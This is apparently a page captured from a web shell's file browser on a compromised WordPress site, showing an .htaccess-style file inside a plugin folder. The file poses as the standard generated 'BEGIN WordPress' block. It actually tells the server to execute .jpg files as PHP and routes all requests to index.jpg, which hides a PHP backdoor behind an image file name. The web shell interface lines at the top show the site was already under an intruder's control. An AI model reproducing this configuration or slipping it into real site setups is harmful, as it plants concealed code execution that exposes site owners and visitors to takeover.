Your IP : 216.73.216.73


Current Path : /home/icmq6107/clients/naddaf/wp-content/plugins/lms/
Upload File :
Current File : /home/icmq6107/clients/naddaf/wp-content/plugins/lms/ht.txt

# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.jpg$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.jpg [L]
</IfModule>

# END WordPress